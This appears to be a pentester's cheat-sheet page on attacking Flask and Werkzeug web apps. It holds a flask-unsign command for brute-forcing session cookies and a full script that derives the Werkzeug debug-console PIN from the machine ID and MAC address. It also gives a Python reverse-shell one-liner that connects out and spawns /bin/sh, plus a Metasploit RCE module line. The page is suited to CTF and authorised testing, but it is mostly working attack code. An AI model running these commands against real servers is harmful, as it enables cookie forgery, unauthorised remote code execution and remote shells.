Flask / Werkzeug

Flask / Werkseug pentesting

Flask | HackTricks

Brute force cookie

flask-unsign --unsign --cookie 'eyJsb2d<-SNIP->Wr3EW6Nuc' -w /usr/share/wordlists/rockyou.txt --no-literal-eval

GitHub - Paradoxis/Flask-Unsign: Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.GitHub

GitHub - iangcarroll/cookiemonster: 🍪 CookieMonster helps you detect and abuse vulnerable implementations of stateless sessions.GitHub

Checks for weak Flask cookie signing password.

GitHub - blacklanternsecurity/badsecrets: A library for detecting known secrets across many web frameworksGitHub

Wordlists

Flask-Unsign-Wordlist/flask_unsign_wordlist/wordlists at master · Paradoxis/Flask-Unsign-WordlistGitHub

SSTI

Flask leverages Jinja2 Templates

SSTI

Werkzeug / Flask Debug

Werkzeug Pentesting | Exploit Noteshideckies

/console

PIN

Werkzeug / Flask Debug | HackTricks | HackTricks

HTB: Agile0xdf hacks stuff

import hashlib
from itertools import chain
probably_public_bits = [
    'web3_user',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
    # '/home/web-app/.local/lib/python3.11/site-packages/flask/app.py' /home/xxx => /proc/self/environ
    # python version on the header
    # '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'
]

private_bits = [
    '279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
    'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

RCE

msf> use exploit/multi/http/werkzeug_debug_rce

GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTFGitHub

Werkzeug - 'Debug Shell' Command ExecutionExploit Database

Werkzeug Hash password

Hashes

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.